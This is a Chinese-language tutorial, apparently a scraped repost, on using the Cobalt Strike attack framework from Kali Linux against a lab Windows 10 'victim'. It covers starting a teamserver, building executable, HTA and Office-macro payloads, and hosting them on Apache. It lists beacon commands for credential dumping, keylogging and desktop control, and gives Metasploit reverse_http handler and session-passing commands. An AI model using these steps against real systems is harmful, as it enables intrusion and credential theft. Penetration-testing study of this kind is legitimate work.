Cobalt Strike从入门到放弃

您所在的位置:网站首页 kali从入门到入狱PDF Cobalt Strike从入门到放弃

Cobalt Strike从入门到放弃

2023-04-05 18:29| 来源: 网络整理| 查看: 265

Cobalt Strike是一款美国Red Team开发的渗透测试神器,常被业界大佬称为CS。本文将会讲述如何在kali Linux安装Cobalt Strike以及使用这款神器。希望给各位一点帮助。

环境介绍kali linux 2021Cobalt Strike4.3windows10(受害机)在kali中安装Cobalt Strike

在kali中安装很简单,Cobalt Strike是基于Java的。因为kali中已经安装了Java环境,所以我们直接可以运行Cobalt Strike。 进入Cobalt Strike目录,执行./start.sh即可运行Cobalt Strike。

这样便启动了Cobalt Strike 如上会提示登录 这时我们需要启动登录服务,因为Cobalt Strike 是可以团队操作。也就是所我们需要启动团队服务器。执行下面命令:

./teamserver 192.168.123.33 pass66 #./teamserver kali的ip 登录密码生成shell

首先配置监听 和msfconsole类似,Cobalt Strike也要配置监听。 Cobalt Strike——Listeners——Add

相关参数说明:

参数

说明

name

监听任务的名称 可随意

payload

监听的方式 支持http https TCP 等

HTTPS HOSTS

主机IP地址

Host Rotation Strategy

主机转移策略 一般默认即可

生成shell Attacks—Packages——windows ececutable

配置windows平台下的shell

保存生成的shell

参数

说明

HTML Application

基于http方式的攻击,如受害者打开网站即可获得shell

MS Office Macro

office宏攻击,如打开word文档即可获得shell

Payload Generator

其他方式的payload,如C python vb

windows ececutable

生成windows平台下的shell

Shell上线 将生成的shell放到/var/www/html,并启动apache服务器

cp kali.exe /var/www/html service apache2 start

当目标主机下载并运行shell后,我们便可以看到回弹。

对目标主机的操作interact 命令模式

当我们点击interact后,便会和msfconsole一样,进入命令模式。 现列出常用的命名

参数

说明

argue

匹配进程的欺骗参数

blockdlls

阻止子进程中的非Microsoft DLL

browserpivot

设置浏览器会话

cancel

取消正在进行的下载

cd

改变目录位置

checkin

呼叫总部并发布数据

chromedump

从Google Chrome恢复凭据

clear

清除信标队列

connect

通过TCP连接到目标

covertV**

部署隐蔽V**客户端

cp

复制文件

dcsync

从DC提取密码哈希

desktop

查看目标桌面并与之交互

dllinject

bbskali.cn

dllload

将反射DLL注入进程

download

文件下载

downloads

列出正在下载的文件

drives

列出目标上的驱动器

elevate

在提升的上下文中生成会话

exit

关闭当前连接

getprivs

对当前令牌启用系统权限

getsystem

提升系统权限

getuid

获取用户ID

hashdump

导出hash密码

keylogger

记录键盘

kill

Kill 掉进程

logonpasswords

使用mimikatz转储凭据和哈希

ls

列出文件列表 bbskali.cn

make_token

创建一个 token

mimikatz

运行神器 mimikatz

mkdir

创建一个目录

mv

移动文件

net

网络和主机枚举

upload

上传文件

如获取C盘文件信息cd / ls和目标屏幕交互desktop其他菜单操作

由于比较多,就不一个个说了。把常用的几个菜单说说。

可视化的文件浏览

Explore-File Browser

对局域网内所有设备扫描

显示目标的所有进程

Cobalt Strike与Msfconsole联动

首先我们在Cobalt Strike中创建一个新的Foreign Http监听

然后在msfconsole中配置监听

use exploit/multi/handler set payload windows/meterpreter/reverse_http set LHOST 192.168.123.33 set LPORT 4444 exploit

返回Cobalt Strike,选择目标,右键Spawn选择我们前面配置的Foreign Http监听

这时,我们返回到msf中便可以看到成功得到回弹。

将msf会话转移到Cobalt Strike

一样,我们先建立一个http的监听

因为在msf中我们已经获得了session 在其配置如下:

use exploit/windows/local/payload_inject set payload windows/meterpreter/reverse_http set DisablePayloadHandler true set LHOST 192.168.123.33 set LPORT 5555 set SESSION 1 run

set DisablePayloadHandler true 作用是msf不监听,代表是用来返给其他监听的 。 然后我们返回到Cobalt Strike这时便可以看到会话了

版权属于:逍遥子大表哥

本文链接:https://blog.bbskali.cn/2592.html

按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。



【本文地址】


今日新闻


推荐新闻


CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3